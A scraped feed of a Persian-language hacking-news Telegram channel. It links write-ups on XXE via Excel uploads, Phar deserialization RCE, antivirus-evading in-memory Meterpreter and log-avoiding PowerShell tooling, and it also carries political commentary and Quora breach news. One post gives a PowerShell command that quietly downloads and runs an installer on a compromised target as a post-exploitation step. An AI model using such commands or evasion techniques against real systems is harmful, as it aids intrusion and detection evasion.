امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
جستجوی آسان اکسپلویت در بات
@GetSploitBot


#exploit
#pentest
#telegram

@sec_nerd
اکسپلویت آسیب پذیری XXE با استفاده از آپلود فایل Excel

https://www.4armed.com/blog/exploiting-xxe-with-excel/


نکته: سعی کنید کلیات کار رو در لینک بالا بخونید اما ممکنه فایل اکسل تولید شده در لینک بالا مشکل داشته باشه. برای حل شدن مشکل فایل تولیدی، فایلی که این کاربر در لینک زیر ارسال کرده رو آنزیپ کنید و توضیحاتش در مورد ادیت فایل و اضافه کردن پیلود رو بخونید:
https://github.com/jmcnamara/excel-reader-xlsx/issues/10


#xxe
#web
#Pentest
#excel


@sec_nerd
رفتارهای کودکانه این روزها همه جا دیده میشه. فوتبال، صداوسیما، مجلس ...
در فضایی که آرمین رادها در حال تاختن هستن، ما دلخوشیمون وزیر جوانی بود که ما و مشکلات ما رو درک کنه و نیمچه حرکتی برای حل شدنشون انجام بده.
اما گویا وزیر محترم، جناب آذری جهرمی صحنه مدیریت و سیاست رو با گروه تین ایجرهای تلگرامی اشتباه گرفتن و برای تقویتِ خیزی که برای اهداف آیندشون برداشتن از هیچ کاری فروگذار نمیکنن،‌ حتی ارسال اسکرین شات!
جناب وزیر .. منم هم سن و سال خودتم و تعجب میکنم از این کارها .. این ره که تو میروی به پاستور ختم نمیشه!

جهت یادآوری: قیمت گوشی، قیمت اینترنت،بکارگیری کارشناسان واقعی آی تی،گزارش هزینه های پیامرسانهای داخلی و خروجیها،مذاکرات با دوروف ،سرویسهای ارزش افزوده، شرطبندیها ...

پوپولیسم ممکنه جواب بده، ولی مشکل ما رو حل نمیکنه!


https://mobile.twitter.com/azarijahromi/status/1068559112512909313


#iran


@sec_nerd
فریمورک NoPowerShell که به زبان سی شارپ نوشته شده و قابلیت اجرای دستورات پاورشل و جلوگیری از لاگ شدن این دستورات توسط ابزارهای امنیتی را دارد.
همچنین میتوان از آن در Cobalt Strike استفاده و دستورات را در حافظه اجرا نمود.

https://github.com/bitsadmin/nopowershell


این فریمورک هنوز کامل نشده و در حال توسعه میباشد.


#windows
#ps
#post_exploit


@sec_nerd
به گوگل اعتماد نکنید!

#google
#fun

@sec_nerd
دستگاه‌های اجرایی ملزم به فعال کردن سامانه پدافند سایبری شدند


البته متن طولانیه و میتونید در لینک منبع کاملش رو بخونید، اینجا فقط بند پ ماده ۵ رو خلاصه میکنم:

دستگاههای اجرایی ملی و استانی موظفند سامانه پدافند رایانیکی(سایبری) دستگاه خود را در سطح ملی و استانی فعال نمایند:

نظام رصد، پایش، تشخیص و هشداردهی تهدیدات سایبری
نظام تعیین وضعیت و مدیریت صحنه پدافند سایبری و پاسخ
نظام کاهش آسیب پذیری، مصون سازی و مقاوم سازی زیرساختهای سایبری
نظام آموزش، تمرین، رزمایش و ارتقای آمادگی و برگزاری رزمایش


دستگاه‌های اجرایی ملی و استانی که سرمایه های ملی سایبری و سرمایه های وابسته به سایبر(حیاتی، حساس و مهم) را در اختیار دارند موظف اند به منظور جلوگیری از نفوذ و مختل نمودن سامانه های نرم افزاری دستگاههای ذی ربط و توسعه آمادگی‌ها، مدیران و کارکنان خود را بر اساس نظام آموزش پدافند سایبری مصوب کمیته دائمی و هدایت و راهبری سازمان آموزش داده و توانمند نمایند.

به منظور ایجاد هماهنگی بین اقدامات و برنامه های پدافند سایبری در دستگاههای اجرایی "کمیته هماهنگی پدافند سایبری" با مسئولیت سازمان/ قرارگاه پدافند سایبری و عضویت مرکز راهبردی افتا (امنیت فضای تبادل اطلاعات)، مرکز ماهر(مدیریت امداد و هماهنگی رخدادهای رایانه ای)، فرماندهی سایبر الکترونیک سپاه و پلیس فتا تشکیل می شود.


منبع:
https://fna.ir/bq6p3r


#iran
#cyber
#security
#news



@sec_nerd
امنیت اطلاعات
دستگاه‌های اجرایی ملزم به فعال کردن سامانه پدافند سایبری شدند البته متن طولانیه و میتونید در لینک منبع کاملش رو بخونید، اینجا فقط بند پ ماده ۵ رو خلاصه میکنم: دستگاههای اجرایی ملی و استانی موظفند سامانه پدافند رایانیکی(سایبری) دستگاه خود را در سطح ملی و…
جستجوهای من برای پیدا کردن "نظام آموزش پدافند سایبری" بی نتیجه بود اگر شما جزییاتی ازش پیدا کردید برای ما بفرستید @chrispal
اما اینکه اعضای کمیته هماهنگی پدافند سایبری رو میبینید و ممکنه با خودتون فکر کنید که «مگه تا حالا امورات دفاع سایبری دست همینا نبود؟» یه کمی ممکنه حس بشه که چیزی قرار نیست تغییر کنه!
کارشناسان کاربلد امنیت رو برخلاف شعار ابتدایی جناب وزیر جهرمی، کسی تحویل نگرفته و نمیگیره و مشخص نیست اون قسمت آموزش مدیران و کارکنان رو چه کسی باید انجام بده.
اگر سطح آموزش ها در حد پیج اینستاگرام باشه،‌اساتیدی مثل بهروز کمالیان و آرمین راد، دردانه های امنیت سایبری رو میشه روشون حساب کرد اما امیدوارم اون بخش سرمایه های ملی سایبر (حیاتی، حساس و مهم) رو به اینها نسپرن و همینجوری که هست باقی بمونه، حداقلش اینه که الان سالی یکی دو بار بیشتر با حمله ی سایبری روترهامون از مدار خارج نمیشن!


#iran
#news


راستی مبدع اون کلمه «رایانیکی» رو هم اگر میشناسید یه سلام خاص بهش برسونید 😁😭

@sec_nerd
اجرای پیلودهای Meterpreter در حافظه برای جلوگیری از شناسایی آن توسط آنتی ویروس ها

https://www.n00py.io/2018/06/executing-meterpreter-in-memory-on-windows-10-and-bypassing-antivirus/


در این پست خواهید دید که چگونه میتوان با تولید پیلود و ارسال آن از طریق smb یا webdav (البته راه های زیادی برای انتقال فایل xml تولید شده به سیستم تارگت وجود دارد از جمله نفوذ از طریق وب یا ftp و ...) آن را اجرا و سشن meterpreter را بر روی سیستم مهاجم بدست آورد.



#msf
#windows
#av
#bypass


@sec_nerd
شرح Phar Deserialization روش جدید اکسپلویت کردن در php است و در WooCommerce منجر به RCE میشود.

https://blog.ripstech.com/2018/phpbb3-phar-deserialization-to-remote-code-execution/


#php
#exploit
#rips
#phpbb3



@sec_nerd
امنیت اطلاعات
اجرای پیلودهای Meterpreter در حافظه برای جلوگیری از شناسایی آن توسط آنتی ویروس ها https://www.n00py.io/2018/06/executing-meterpreter-in-memory-on-windows-10-and-bypassing-antivirus/ در این پست خواهید دید که چگونه میتوان با تولید پیلود و ارسال آن از طریق…
اگر دات نت فریمورک 4 روی سیستم هدف نصب نبود با دستور زیر میتوانید، از طریق پاورشل و بدون جلب توجه، آنرا نصب کنید:

((new-object net.webclient).DownloadFile("https://download.microsoft.com/download/9/5/A/95A9616B-7A37-4AF6-BC36-D6EA96C8DAAE/dotNetFx40_Full_x86_x64.exe","dotNetFx40_Full_x86_x64.exe"))
& .\dotNetFx40_Full_x86_x64.exe /q


روش بر روی ویندوز ۲۰۰۸ r2 تست شده
با کسپرسکای و پیلود reverse_tcp

#msf
#windows
#av
#bypass


@sec_nerd
بزرگترین وبسایت پرسش و پاسخ جهان، Quora توسط هکرهای ناشناخته ای هک شد!
این هکرها موفق شدند به اطلاعات شخصی حدود ۱۰۰ میلیون کاربر این وبسایت دست پیدا کنند. این اتفاق در روز دوشنبه رخ داد و تیم Quora متوجه شد که یک دسترسی غیرمجاز بر روی یکی از سیستم ها ایجاد شده است.
اطلاعات کاربری شامل نام، ایمیل، پسورد هش شده ، سوال و جوابها، پیامهای خصوصی، کامنتها، لایکها و اطلاعات ایمپورت شده از شبکه های اجتماعی نظیر فیسبوک و توییتر در این دیتابیس وجود داشته است.
شرکت Quora اعلام کرد که تمام پسوردها بصورت سالت شده و هش شده ذخیره شده اند اما تمامی کاربرانی که در بین این صد میلیون وجود داشته اند توسط تیم Quora بصورت اجباری از حسابشان اخراج و مجبور به تغییر پسورد شده اند.



https://thehackernews.com/2018/12/quora-hack.html

#news
#quora
#breach


@sec_nerd